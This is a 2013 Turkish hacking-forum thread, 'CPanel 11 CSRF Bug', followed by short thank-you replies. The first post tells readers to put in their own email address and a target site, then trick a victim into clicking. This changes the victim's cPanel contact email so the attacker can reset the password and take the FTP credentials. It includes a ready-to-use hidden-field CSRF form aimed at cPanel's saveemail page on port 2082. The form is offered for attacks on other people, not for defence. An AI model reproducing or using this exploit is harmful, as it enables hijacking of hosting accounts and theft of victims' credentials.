CPanel 11 CSRF Bug

laincest · 15 Haz 2013

CPanel 11 CSRF Bug
x@mail.com yerini kendi mailinizle değiştirip hedef sitenin yerini felan ayarlıyorsunuz kendinize göre sonra bunu kurbana tıklatıyorsunuz ve cpanelin kayıtlı olduğu mail yeri sizin mailinizle değişiyor daha sonra parola sıfırlama atıyorsunuz ve ftp şifresini alıyorsunuz.

[hide]

PHP:

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"   
action="http://www.google.com:2082/frontend/x3/contact/saveemail.html"> 

<input id="email"                    name="email"                    type="hidden" value="x@mail.com"> 
<input id="second_email"             name="second_email"             type="hidden" value=""> 
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1"> 
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1"> 
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1"> 

<input type="submit" class="input-button" value="Save"> 

</form>

[/hide]

Umut · 15 Haz 2013

eyvallah

Asil_Mehmet · 15 Haz 2013

eyw bakalım dostum

RujAjan · 15 Haz 2013

eyw eline saglık

x-Qey · 15 Haz 2013

eline saglık

Cybermaster · 15 Haz 2013

eyw. bir bakalım

Ara

CPanel 11 CSRF Bug

laincest

Yeni Üye

Umut

Spys-Z

Asil_Mehmet

Forumdan Uzaklaştırıldı

RujAjan

Özel Üye

x-Qey

Özel Üye

Cybermaster

Prof Spys-z